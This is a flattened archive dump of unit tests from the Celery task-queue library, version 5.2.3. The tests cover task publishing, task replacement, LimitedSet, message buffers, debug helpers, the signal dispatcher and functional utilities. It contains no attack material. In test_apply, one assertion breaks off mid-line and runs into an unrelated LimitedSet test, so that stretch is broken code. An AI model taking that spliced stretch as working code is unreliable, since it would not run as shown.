parse_iso8601(task_headers.get('eta')) assert isinstance(to_datetime, datetime) if test_expires: assert isinstance(task_headers.get('expires'), str) to_datetime = parse_iso8601(task_headers.get('expires')) assert isinstance(to_datetime, datetime) properties = properties or {} for arg_name, arg_value in properties.items(): assert task_properties.get(arg_name) == arg_value headers = headers or {} for arg_name, arg_value in headers.items(): assert task_headers.get(arg_name) == arg_value for arg_name, arg_value in kwargs.items(): assert task_kwargs.get(arg_name) == arg_value def test_incomplete_task_cls(self): class IncompleteTask(Task): app = self.app name = 'c.unittest.t.itask' with pytest.raises(NotImplementedError): IncompleteTask().run() def test_task_kwargs_must_be_dictionary(self): with pytest.raises(TypeError): self.increment_counter.apply_async([], 'str') def test_task_args_must_be_list(self): with pytest.raises(TypeError): self.increment_counter.apply_async('s', {}) def test_regular_task(self): assert isinstance(self.mytask, Task) assert self.mytask.run() assert callable(self.mytask) assert self.mytask(), 'Task class runs run() when called' with self.app.connection_or_acquire() as conn: consumer = self.app.amqp.TaskConsumer(conn) with pytest.raises(NotImplementedError): consumer.receive('foo', 'foo') consumer.purge() assert consumer.queues[0].get() is None self.app.amqp.TaskConsumer(conn, queues=[Queue('foo')]) # Without arguments. presult = self.mytask.delay() self.assert_next_task_data_equal( consumer, presult, self.mytask.name) # With arguments. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', ) # send_task sresult = self.app.send_task(self.mytask.name, kwargs={'name': 'Elaine M. Benes'}) self.assert_next_task_data_equal( consumer, sresult, self.mytask.name, name='Elaine M. Benes', ) # With ETA, absolute expires. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=self.now() + timedelta(days=2), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With ETA, absolute expires without timezone. presult2 = self.mytask.apply_async( kwargs={'name': 'George Constanza'}, eta=self.now() + timedelta(days=1), expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Constanza', test_eta=True, test_expires=True, ) # With ETA, absolute expires in the past. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=self.now() - timedelta(days=2), ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With ETA, relative expires. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, eta=self.now() + timedelta(days=1), expires=2 * 24 * 60 * 60, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # With countdown. presult2 = self.mytask.apply_async( kwargs={'name': 'George Costanza'}, countdown=10, expires=12, ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, name='George Costanza', test_eta=True, test_expires=True, ) # Default argsrepr/kwargsrepr behavior presult2 = self.mytask.apply_async( args=('spam',), kwargs={'name': 'Jerry Seinfeld'} ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, headers={'argsrepr': "('spam',)", 'kwargsrepr': "{'name': 'Jerry Seinfeld'}"}, ) # With argsrepr/kwargsrepr presult2 = self.mytask.apply_async( args=('secret',), argsrepr="'***'", kwargs={'password': 'foo'}, kwargsrepr="{'password': '***'}", ) self.assert_next_task_data_equal( consumer, presult2, self.mytask.name, headers={'argsrepr': "'***'", 'kwargsrepr': "{'password': '***'}"}, ) # Discarding all tasks. consumer.purge() self.mytask.apply_async() assert consumer.purge() == 1 assert consumer.queues[0].get() is None assert not presult.successful() self.mytask.backend.mark_as_done(presult.id, result=None) assert presult.successful() def test_send_event(self): mytask = self.mytask._get_current_object() mytask.app.events = Mock(name='events') mytask.app.events.attach_mock(ContextMock(), 'default_dispatcher') mytask.request.id = 'fb' mytask.send_event('task-foo', id=3122) mytask.app.events.default_dispatcher().send.assert_called_with( 'task-foo', uuid='fb', id=3122, retry=True, retry_policy=self.app.conf.task_publish_retry_policy) def test_replace(self): sig1 = MagicMock(name='sig1') sig1.options = {} self.mytask.request.id = sentinel.request_id with pytest.raises(Ignore): self.mytask.replace(sig1) sig1.freeze.assert_called_once_with(self.mytask.request.id) sig1.set.assert_called_once_with(replaced_task_nesting=1, chord=ANY, group_id=ANY, group_index=ANY, root_id=ANY) def test_replace_with_chord(self): sig1 = Mock(name='sig1') sig1.options = {'chord': None} with pytest.raises(ImproperlyConfigured): self.mytask.replace(sig1) def test_replace_callback(self): c = group([self.mytask.s()], app=self.app) c.freeze = Mock(name='freeze') c.delay = Mock(name='delay') self.mytask.request.id = 'id' self.mytask.request.group = 'group' self.mytask.request.root_id = 'root_id' self.mytask.request.callbacks = callbacks = 'callbacks' self.mytask.request.errbacks = errbacks = 'errbacks' # Replacement groups get uplifted to chords so that we can accumulate # the results and link call/errbacks - patch the appropriate `chord` # methods so we can validate this behaviour with patch( "celery.canvas.chord.link" ) as mock_chord_link, patch( "celery.canvas.chord.link_error" ) as mock_chord_link_error: with pytest.raises(Ignore): self.mytask.replace(c) # Confirm that the call/errbacks on the original signature are linked # to the replacement signature as expected mock_chord_link.assert_called_once_with(callbacks) mock_chord_link_error.assert_called_once_with(errbacks) def test_replace_group(self): c = group([self.mytask.s()], app=self.app) c.freeze = Mock(name='freeze') c.delay = Mock(name='delay') self.mytask.request.id = 'id' self.mytask.request.group = 'group' self.mytask.request.root_id = 'root_id', with pytest.raises(Ignore): self.mytask.replace(c) def test_replace_run(self): with pytest.raises(Ignore): self.task_replaced_by_other_task.run() def test_replace_run_with_autoretry(self): with pytest.raises(Ignore): self.task_replaced_by_other_task_with_autoretry.run() def test_replace_delay(self): res = self.task_replaced_by_other_task.delay() assert isinstance(res, AsyncResult) def test_replace_apply(self): res = self.task_replaced_by_other_task.apply() assert isinstance(res, EagerResult) assert res.get() == "replaced" def test_add_trail__no_trail(self): mytask = self.increment_counter._get_current_object() mytask.trail = False mytask.add_trail('foo') def test_repr_v2_compat(self): self.mytask.__v2_compat__ = True assert 'v2 compatible' in repr(self.mytask) def test_context_get(self): self.mytask.push_request() try: request = self.mytask.request request.foo = 32 assert request.get('foo') == 32 assert request.get('bar', 36) == 36 request.clear() finally: self.mytask.pop_request() def test_annotate(self): with patch('celery.app.task.resolve_all_annotations') as anno: anno.return_value = [{'FOO': 'BAR'}] @self.app.task(shared=False) def task(): pass task.annotate() assert task.FOO == 'BAR' def test_after_return(self): self.mytask.push_request() try: self.mytask.request.chord = self.mytask.s() self.mytask.after_return('SUCCESS', 1.0, 'foobar', (), {}, None) self.mytask.request.clear() finally: self.mytask.pop_request() def test_update_state(self): @self.app.task(shared=False) def yyy(): pass yyy.push_request() try: tid = uuid() # update_state should accept arbitrary kwargs, which are passed to # the backend store_result method yyy.update_state(tid, 'FROBULATING', {'fooz': 'baaz'}, arbitrary_kwarg=None) assert yyy.AsyncResult(tid).status == 'FROBULATING' assert yyy.AsyncResult(tid).result == {'fooz': 'baaz'} yyy.request.id = tid yyy.update_state(state='FROBUZATING', meta={'fooz': 'baaz'}) assert yyy.AsyncResult(tid).status == 'FROBUZATING' assert yyy.AsyncResult(tid).result == {'fooz': 'baaz'} finally: yyy.pop_request() def test_update_state_passes_request_to_backend(self): backend = Mock() @self.app.task(shared=False, backend=backend) def ttt(): pass ttt.push_request() tid = uuid() ttt.update_state(tid, 'SHRIMMING', {'foo': 'bar'}) backend.store_result.assert_called_once_with( tid, {'foo': 'bar'}, 'SHRIMMING', request=ttt.request ) def test_repr(self): @self.app.task(shared=False) def task_test_repr(): pass assert 'task_test_repr' in repr(task_test_repr) def test_has___name__(self): @self.app.task(shared=False) def yyy2(): pass assert yyy2.__name__ def test_default_priority(self): @self.app.task(shared=False) def yyy3(): pass @self.app.task(shared=False, priority=66) def yyy4(): pass @self.app.task(shared=False, bind=True, base=TaskWithPriority) def yyy5(self): pass self.app.conf.task_default_priority = 42 old_send_task = self.app.send_task self.app.send_task = Mock() yyy3.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=42, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = Mock() yyy4.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=66, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = Mock() yyy5.delay() self.app.send_task.assert_called_once_with(ANY, ANY, ANY, compression=ANY, delivery_mode=ANY, exchange=ANY, expires=ANY, immediate=ANY, link=ANY, link_error=ANY, mandatory=ANY, priority=10, producer=ANY, queue=ANY, result_cls=ANY, routing_key=ANY, serializer=ANY, soft_time_limit=ANY, task_id=ANY, task_type=ANY, time_limit=ANY, shadow=None, ignore_result=False) self.app.send_task = old_send_task class test_apply_task(TasksCase): def test_apply_throw(self): with pytest.raises(KeyError): self.raising.apply(throw=True) def test_apply_with_task_eager_propagates(self): self.app.conf.task_eager_propagates = True with pytest.raises(KeyError): self.raising.apply() def test_apply_request_context_is_ok(self): self.app.conf.task_eager_propagates = True self.task_check_request_context.apply() def test_apply(self): self.increment_counter.count = 0 e = self.increment_counter.apply() assert isinstance(e, EagerResult) assert e.get() == 1 e = self.increment_counter.apply(args=[1]) assert e.get() == 2 e = self.increment_counter.apply(kwargs={'increment_by': 4}) assert e.get() == 6 assert e.successful() assert e.ready() assert repr(e).startswith(' minsize s = LimitedSet(maxlen=10, minlen=10, expires=1) [s.add(i) for i in range(20)] s.minlen = 3 s.purge(now=monotonic() + 3) assert s.minlen == len(s) assert len(s._heap) <= s.maxlen * ( 100. + s.max_heap_percent_overload) / 100 def test_pickleable(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('bar') assert pickle.loads(pickle.dumps(s)) == s def test_iter(self): s = LimitedSet(maxlen=3) items = ['foo', 'bar', 'baz', 'xaz'] for item in items: s.add(item) l = list(iter(s)) for item in items[1:]: assert item in l assert 'foo' not in l assert l == items[1:], 'order by insertion time' def test_repr(self): s = LimitedSet(maxlen=2) items = 'foo', 'bar' for item in items: s.add(item) assert 'LimitedSet(' in repr(s) def test_discard(self): s = LimitedSet(maxlen=2) s.add('foo') s.discard('foo') assert 'foo' not in s assert len(s._data) == 0 s.discard('foo') def test_clear(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('bar') assert len(s) == 2 s.clear() assert not s def test_update(self): s1 = LimitedSet(maxlen=2) s1.add('foo') s1.add('bar') s2 = LimitedSet(maxlen=2) s2.update(s1) assert sorted(list(s2)) == ['bar', 'foo'] s2.update(['bla']) assert sorted(list(s2)) == ['bar', 'bla'] s2.update(['do', 're']) assert sorted(list(s2)) == ['do', 're'] s1 = LimitedSet(maxlen=10, expires=None) s2 = LimitedSet(maxlen=10, expires=None) s3 = LimitedSet(maxlen=10, expires=None) s4 = LimitedSet(maxlen=10, expires=None) s5 = LimitedSet(maxlen=10, expires=None) for i in range(12): s1.add(i) s2.add(i * i) s3.update(s1) s3.update(s2) s4.update(s1.as_dict()) s4.update(s2.as_dict()) s5.update(s1._data) # revoke is using this s5.update(s2._data) assert s3 == s4 assert s3 == s5 s2.update(s4) s4.update(s2) assert s2 == s4 def test_iterable_and_ordering(self): s = LimitedSet(maxlen=35, expires=None) clock = count(1) for i in reversed(range(15)): s.add(i, now=next(clock)) j = 40 for i in s: assert i < j # each item is smaller and smaller j = i assert i == 0 # last item is zero def test_pop_and_ordering_again(self): s = LimitedSet(maxlen=5) for i in range(10): s.add(i) j = -1 for _ in range(5): i = s.pop() assert j < i i = s.pop() assert i is None def test_as_dict(self): s = LimitedSet(maxlen=2) s.add('foo') assert isinstance(s.as_dict(), Mapping) def test_add_removes_duplicate_from_small_heap(self): s = LimitedSet(maxlen=2) s.add('foo') s.add('foo') s.add('foo') assert len(s) == 1 assert len(s._data) == 1 assert len(s._heap) == 1 def test_add_removes_duplicate_from_big_heap(self): s = LimitedSet(maxlen=1000) [s.add(i) for i in range(2000)] assert len(s) == 1000 [s.add('foo') for i in range(1000)] # heap is refreshed when 15% larger than _data assert len(s._heap) < 1150 [s.add('foo') for i in range(1000)] assert len(s._heap) < 1150 class test_AttributeDict: def test_getattr__setattr(self): x = AttributeDict({'foo': 'bar'}) assert x['foo'] == 'bar' with pytest.raises(AttributeError): x.bar x.bar = 'foo' assert x['bar'] == 'foo' class test_Messagebuffer: def assert_size_and_first(self, buf, size, expected_first_item): assert len(buf) == size assert buf.take() == expected_first_item def test_append_limited(self): b = Messagebuffer(10) for i in range(20): b.put(i) self.assert_size_and_first(b, 10, 10) def test_append_unlimited(self): b = Messagebuffer(None) for i in range(20): b.put(i) self.assert_size_and_first(b, 20, 0) def test_extend_limited(self): b = Messagebuffer(10) b.extend(list(range(20))) self.assert_size_and_first(b, 10, 10) def test_extend_unlimited(self): b = Messagebuffer(None) b.extend(list(range(20))) self.assert_size_and_first(b, 20, 0) def test_extend_eviction_time_limited(self): b = Messagebuffer(3000) b.extend(range(10000)) assert len(b) > 3000 b.evict() assert len(b) == 3000 def test_pop_empty_with_default(self): b = Messagebuffer(10) sentinel = object() assert b.take(sentinel) is sentinel def test_pop_empty_no_default(self): b = Messagebuffer(10) with pytest.raises(b.Empty): b.take() def test_repr(self): assert repr(Messagebuffer(10, [1, 2, 3])) def test_iter(self): b = Messagebuffer(10, list(range(10))) assert len(b) == 10 for i, item in enumerate(b): assert item == i assert len(b) == 0 def test_contains(self): b = Messagebuffer(10, list(range(10))) assert 5 in b def test_reversed(self): assert (list(reversed(Messagebuffer(10, list(range(10))))) == list(reversed(range(10)))) def test_getitem(self): b = Messagebuffer(10, list(range(10))) for i in range(10): assert b[i] == i class test_BufferMap: def test_append_limited(self): b = BufferMap(10) for i in range(20): b.put(i, i) self.assert_size_and_first(b, 10, 10) def assert_size_and_first(self, buf, size, expected_first_item): assert buf.total == size assert buf._LRUpop() == expected_first_item def test_append_unlimited(self): b = BufferMap(None) for i in range(20): b.put(i, i) self.assert_size_and_first(b, 20, 0) def test_extend_limited(self): b = BufferMap(10) b.extend(1, list(range(20))) self.assert_size_and_first(b, 10, 10) def test_extend_unlimited(self): b = BufferMap(None) b.extend(1, list(range(20))) self.assert_size_and_first(b, 20, 0) def test_pop_empty_with_default(self): b = BufferMap(10) sentinel = object() assert b.take(1, sentinel) is sentinel def test_pop_empty_no_default(self): b = BufferMap(10) with pytest.raises(b.Empty): b.take(1) def test_repr(self): assert repr(Messagebuffer(10, [1, 2, 3])) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_debug.py0000664000175000017500000000446500000000000017767 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery.utils import debug def test_on_blocking(patching): getframeinfo = patching('inspect.getframeinfo') frame = Mock(name='frame') with pytest.raises(RuntimeError): debug._on_blocking(1, frame) getframeinfo.assert_called_with(frame) def test_blockdetection(patching): signals = patching('celery.utils.debug.signals') with debug.blockdetection(10): signals.arm_alarm.assert_called_with(10) signals.__setitem__.assert_called_with('ALRM', debug._on_blocking) signals.__setitem__.assert_called_with('ALRM', signals['ALRM']) signals.reset_alarm.assert_called_with() def test_sample_mem(patching): mem_rss = patching('celery.utils.debug.mem_rss') prev, debug._mem_sample = debug._mem_sample, [] try: debug.sample_mem() assert debug._mem_sample[0] is mem_rss() finally: debug._mem_sample = prev def test_sample(): x = list(range(100)) assert list(debug.sample(x, 10)) == [ 0, 10, 20, 30, 40, 50, 60, 70, 80, 90, ] x = list(range(91)) assert list(debug.sample(x, 10)) == [ 0, 9, 18, 27, 36, 45, 54, 63, 72, 81, ] @pytest.mark.parametrize('f,precision,expected', [ (10, 5, '10'), (10.45645234234, 5, '10.456'), ]) def test_hfloat(f, precision, expected): assert str(debug.hfloat(f, precision)) == expected @pytest.mark.parametrize('byt,expected', [ (2 ** 20, '1MB'), (4 * 2 ** 20, '4MB'), (2 ** 16, '64KB'), (2 ** 16, '64KB'), (2 ** 8, '256b'), ]) def test_humanbytes(byt, expected): assert debug.humanbytes(byt) == expected def test_mem_rss(patching): humanbytes = patching('celery.utils.debug.humanbytes') ps = patching('celery.utils.debug.ps') ret = debug.mem_rss() ps.assert_called_with() ps().memory_info.assert_called_with() humanbytes.assert_called_with(ps().memory_info().rss) assert ret is humanbytes() ps.return_value = None assert debug.mem_rss() is None def test_ps(patching): Process = patching('celery.utils.debug.Process') getpid = patching('os.getpid') prev, debug._process = debug._process, None try: debug.ps() Process.assert_called_with(getpid()) assert debug._process is Process() finally: debug._process = prev ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_deprecated.py0000664000175000017500000000331100000000000020766 0ustar00asifasif00000000000000from unittest.mock import patch import pytest from celery.utils import deprecated class test_deprecated_property: @patch('celery.utils.deprecated.warn') def test_deprecated(self, warn): class X: _foo = None @deprecated.Property(deprecation='1.2') def foo(self): return self._foo @foo.setter def foo(self, value): self._foo = value @foo.deleter def foo(self): self._foo = None assert X.foo assert X.foo.__set__(None, 1) assert X.foo.__delete__(None) x = X() x.foo = 10 warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) warn.reset_mock() assert x.foo == 10 warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) warn.reset_mock() del(x.foo) warn.assert_called_with( stacklevel=3, deprecation='1.2', alternative=None, description='foo', removal=None, ) assert x._foo is None def test_deprecated_no_setter_or_deleter(self): class X: @deprecated.Property(deprecation='1.2') def foo(self): pass assert X.foo x = X() with pytest.raises(AttributeError): x.foo = 10 with pytest.raises(AttributeError): del(x.foo) class test_warn: @patch('warnings.warn') def test_warn_deprecated(self, warn): deprecated.warn('Foo') warn.assert_called() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_dispatcher.py0000664000175000017500000001216100000000000021017 0ustar00asifasif00000000000000import gc import sys import time from celery.utils.dispatch import Signal if sys.platform.startswith('java'): def garbage_collect(): # Some JVM GCs will execute finalizers in a different thread, meaning # we need to wait for that to complete before we go on looking for the # effects of that. gc.collect() time.sleep(0.1) elif hasattr(sys, 'pypy_version_info'): def garbage_collect(): # Collecting weakreferences can take two collections on PyPy. gc.collect() gc.collect() else: def garbage_collect(): gc.collect() def receiver_1_arg(val, **kwargs): return val class Callable: def __call__(self, val, **kwargs): return val def a(self, val, **kwargs): return val a_signal = Signal(providing_args=['val'], use_caching=False) class test_Signal: """Test suite for dispatcher (barely started)""" def _testIsClean(self, signal): """Assert that everything has been cleaned up automatically""" assert not signal.has_listeners() assert signal.receivers == [] def test_exact(self): a_signal.connect(receiver_1_arg, sender=self) try: expected = [(receiver_1_arg, 'test')] result = a_signal.send(sender=self, val='test') assert result == expected finally: a_signal.disconnect(receiver_1_arg, sender=self) self._testIsClean(a_signal) def test_ignored_sender(self): a_signal.connect(receiver_1_arg) try: expected = [(receiver_1_arg, 'test')] result = a_signal.send(sender=self, val='test') assert result == expected finally: a_signal.disconnect(receiver_1_arg) self._testIsClean(a_signal) def test_garbage_collected(self): a = Callable() a_signal.connect(a.a, sender=self) expected = [] del a garbage_collect() result = a_signal.send(sender=self, val='test') assert result == expected self._testIsClean(a_signal) def test_multiple_registration(self): a = Callable() result = None try: a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) a_signal.connect(a) result = a_signal.send(sender=self, val='test') assert len(result) == 1 assert len(a_signal.receivers) == 1 finally: del a del result garbage_collect() self._testIsClean(a_signal) def test_uid_registration(self): def uid_based_receiver_1(**kwargs): pass def uid_based_receiver_2(**kwargs): pass a_signal.connect(uid_based_receiver_1, dispatch_uid='uid') try: a_signal.connect(uid_based_receiver_2, dispatch_uid='uid') assert len(a_signal.receivers) == 1 finally: a_signal.disconnect(dispatch_uid='uid') self._testIsClean(a_signal) def test_robust(self): def fails(val, **kwargs): raise ValueError('this') a_signal.connect(fails) try: a_signal.send(sender=self, val='test') finally: a_signal.disconnect(fails) self._testIsClean(a_signal) def test_disconnection(self): receiver_1 = Callable() receiver_2 = Callable() receiver_3 = Callable() try: try: a_signal.connect(receiver_1) a_signal.connect(receiver_2) a_signal.connect(receiver_3) finally: a_signal.disconnect(receiver_1) del receiver_2 garbage_collect() finally: a_signal.disconnect(receiver_3) self._testIsClean(a_signal) def test_retry(self): class non_local: counter = 1 def succeeds_eventually(val, **kwargs): non_local.counter += 1 if non_local.counter < 3: raise ValueError('this') return val a_signal.connect(succeeds_eventually, sender=self, retry=True) try: result = a_signal.send(sender=self, val='test') assert non_local.counter == 3 assert result[0][1] == 'test' finally: a_signal.disconnect(succeeds_eventually, sender=self) self._testIsClean(a_signal) def test_retry_with_dispatch_uid(self): uid = 'abc123' a_signal.connect(receiver_1_arg, sender=self, retry=True, dispatch_uid=uid) assert a_signal.receivers[0][0][0] == uid a_signal.disconnect(receiver_1_arg, sender=self, dispatch_uid=uid) self._testIsClean(a_signal) def test_boundmethod(self): a = Callable() a_signal.connect(a.a, sender=self) expected = [(a.a, 'test')] garbage_collect() result = a_signal.send(sender=self, val='test') assert result == expected del a, result, expected garbage_collect() self._testIsClean(a_signal) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_functional.py0000664000175000017500000003174200000000000021041 0ustar00asifasif00000000000000import collections import pytest import pytest_subtests # noqa: F401 from kombu.utils.functional import lazy from celery.utils.functional import (DummyContext, first, firstmethod, fun_accepts_kwargs, fun_takes_argument, head_from_fun, lookahead, maybe_list, mlazy, padlist, regen, seq_concat_item, seq_concat_seq) def test_DummyContext(): with DummyContext(): pass with pytest.raises(KeyError): with DummyContext(): raise KeyError() @pytest.mark.parametrize('items,n,default,expected', [ (['George', 'Costanza', 'NYC'], 3, None, ['George', 'Costanza', 'NYC']), (['George', 'Costanza'], 3, None, ['George', 'Costanza', None]), (['George', 'Costanza', 'NYC'], 4, 'Earth', ['George', 'Costanza', 'NYC', 'Earth']), ]) def test_padlist(items, n, default, expected): assert padlist(items, n, default=default) == expected class test_firstmethod: def test_AttributeError(self): assert firstmethod('foo')([object()]) is None def test_handles_lazy(self): class A: def __init__(self, value=None): self.value = value def m(self): return self.value assert 'four' == firstmethod('m')([ A(), A(), A(), A('four'), A('five')]) assert 'four' == firstmethod('m')([ A(), A(), A(), lazy(lambda: A('four')), A('five')]) def test_first(): iterations = [0] def predicate(value): iterations[0] += 1 if value == 5: return True return False assert first(predicate, range(10)) == 5 assert iterations[0] == 6 iterations[0] = 0 assert first(predicate, range(10, 20)) is None assert iterations[0] == 10 def test_lookahead(): assert list(lookahead(x for x in range(6))) == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] def test_maybe_list(): assert maybe_list(1) == [1] assert maybe_list([1]) == [1] assert maybe_list(None) is None def test_mlazy(): it = iter(range(20, 30)) p = mlazy(it.__next__) assert p() == 20 assert p.evaluated assert p() == 20 assert repr(p) == '20' class test_regen: def test_list(self): l = [1, 2] r = regen(iter(l)) assert regen(l) is l assert r == l assert r == l # again assert r.__length_hint__() == 0 fun, args = r.__reduce__() assert fun(*args) == l @pytest.fixture def g(self): return regen(iter(list(range(10)))) def test_gen(self, g): assert g[7] == 7 assert g[6] == 6 assert g[5] == 5 assert g[4] == 4 assert g[3] == 3 assert g[2] == 2 assert g[1] == 1 assert g[0] == 0 assert g.data, list(range(10)) assert g[8] == 8 assert g[0] == 0 def test_gen__index_2(self, g): assert g[0] == 0 assert g[1] == 1 assert g.data == list(range(10)) def test_gen__index_error(self, g): assert g[0] == 0 with pytest.raises(IndexError): g[11] assert list(iter(g)) == list(range(10)) def test_gen__negative_index(self, g): assert g[-1] == 9 assert g[-2] == 8 assert g[-3] == 7 assert g[-4] == 6 assert g[-5] == 5 assert g[5] == 5 assert g.data == list(range(10)) assert list(iter(g)) == list(range(10)) def test_nonzero__does_not_consume_more_than_first_item(self): def build_generator(): yield 1 pytest.fail("generator should not consume past first item") yield 2 g = regen(build_generator()) assert bool(g) assert g[0] == 1 def test_nonzero__empty_iter(self): assert not regen(iter([])) def test_deque(self): original_list = [42] d = collections.deque(original_list) # Confirm that concretising a `regen()` instance repeatedly for an # equality check always returns the original list g = regen(d) assert g == original_list assert g == original_list def test_repr(self): def die(): raise AssertionError("Generator died") yield None # Confirm that `regen()` instances are not concretised when represented g = regen(die()) assert "..." in repr(g) def test_partial_reconcretisation(self): class WeirdIterator(): def __init__(self, iter_): self.iter_ = iter_ self._errored = False def __iter__(self): yield from self.iter_ if not self._errored: try: # This should stop the regen instance from marking # itself as being done raise AssertionError("Iterator errored") finally: self._errored = True original_list = list(range(42)) g = regen(WeirdIterator(original_list)) iter_g = iter(g) for e in original_list: assert e == next(iter_g) with pytest.raises(AssertionError, match="Iterator errored"): next(iter_g) # The following checks are for the known "misbehaviour" assert getattr(g, "_regen__done") is False # If the `regen()` instance doesn't think it's done then it'll dupe the # elements from the underlying iterator if it can be re-used iter_g = iter(g) for e in original_list * 2: assert next(iter_g) == e with pytest.raises(StopIteration): next(iter_g) assert getattr(g, "_regen__done") is True # Finally we xfail this test to keep track of it raise pytest.xfail(reason="#6794") def test_length_hint_passthrough(self, g): assert g.__length_hint__() == 10 def test_getitem_repeated(self, g): halfway_idx = g.__length_hint__() // 2 assert g[halfway_idx] == halfway_idx # These are now concretised so they should be returned without any work assert g[halfway_idx] == halfway_idx for i in range(halfway_idx + 1): assert g[i] == i # This should only need to concretise one more element assert g[halfway_idx + 1] == halfway_idx + 1 def test_done_does_not_lag(self, g): """ Don't allow regen to return from `__iter__()` and check `__done`. """ # The range we zip with here should ensure that the `regen.__iter__` # call never gets to return since we never attempt a failing `next()` len_g = g.__length_hint__() for i, __ in zip(range(len_g), g): assert getattr(g, "_regen__done") is (i == len_g - 1) # Just for sanity, check against a specific `bool` here assert getattr(g, "_regen__done") is True def test_lookahead_consume(self, subtests): """ Confirm that regen looks ahead by a single item as expected. """ def g(): yield from ["foo", "bar"] raise pytest.fail("This should never be reached") with subtests.test(msg="bool does not overconsume"): assert bool(regen(g())) with subtests.test(msg="getitem 0th does not overconsume"): assert regen(g())[0] == "foo" with subtests.test(msg="single iter does not overconsume"): assert next(iter(regen(g()))) == "foo" class ExpectedException(BaseException): pass def g2(): yield from ["foo", "bar"] raise ExpectedException() with subtests.test(msg="getitem 1th does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): r[1] # Confirm that the item was concretised anyway assert r[1] == "bar" with subtests.test(msg="full iter does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): for _ in r: pass # Confirm that the items were concretised anyway assert r == ["foo", "bar"] with subtests.test(msg="data access does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): r.data # Confirm that the items were concretised anyway assert r == ["foo", "bar"] class test_head_from_fun: def test_from_cls(self): class X: def __call__(x, y, kwarg=1): pass g = head_from_fun(X()) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_from_fun(self): def f(x, y, kwarg=1): pass g = head_from_fun(f) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_regression_3678(self): local = {} fun = ('def f(foo, *args, bar="", **kwargs):' ' return foo, args, bar') exec(fun, {}, local) g = head_from_fun(local['f']) g(1) g(1, 2, 3, 4, bar=100) with pytest.raises(TypeError): g(bar=100) def test_from_fun_with_hints(self): local = {} fun = ('def f_hints(x: int, y: int, kwarg: int=1):' ' pass') exec(fun, {}, local) f_hints = local['f_hints'] g = head_from_fun(f_hints) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_from_fun_forced_kwargs(self): local = {} fun = ('def f_kwargs(*, a, b="b", c=None):' ' return') exec(fun, {}, local) f_kwargs = local['f_kwargs'] g = head_from_fun(f_kwargs) with pytest.raises(TypeError): g(1) g(a=1) g(a=1, b=2) g(a=1, b=2, c=3) def test_classmethod(self): class A: @classmethod def f(cls, x): return x fun = head_from_fun(A.f, bound=False) assert fun(A, 1) == 1 fun = head_from_fun(A.f, bound=True) assert fun(1) == 1 def test_kwonly_required_args(self): local = {} fun = ('def f_kwargs_required(*, a="a", b, c=None):' ' return') exec(fun, {}, local) f_kwargs_required = local['f_kwargs_required'] g = head_from_fun(f_kwargs_required) with pytest.raises(TypeError): g(1) with pytest.raises(TypeError): g(a=1) with pytest.raises(TypeError): g(c=1) with pytest.raises(TypeError): g(a=2, c=1) g(b=3) class test_fun_takes_argument: def test_starkwargs(self): assert fun_takes_argument('foo', lambda **kw: 1) def test_named(self): assert fun_takes_argument('foo', lambda a, foo, bar: 1) def fun(a, b, c, d): return 1 assert fun_takes_argument('foo', fun, position=4) def test_starargs(self): assert fun_takes_argument('foo', lambda a, *args: 1) def test_does_not(self): assert not fun_takes_argument('foo', lambda a, bar, baz: 1) assert not fun_takes_argument('foo', lambda: 1) def fun(a, b, foo): return 1 assert not fun_takes_argument('foo', fun, position=4) @pytest.mark.parametrize('a,b,expected', [ ((1, 2, 3), [4, 5], (1, 2, 3, 4, 5)), ((1, 2), [3, 4, 5], [1, 2, 3, 4, 5]), ([1, 2, 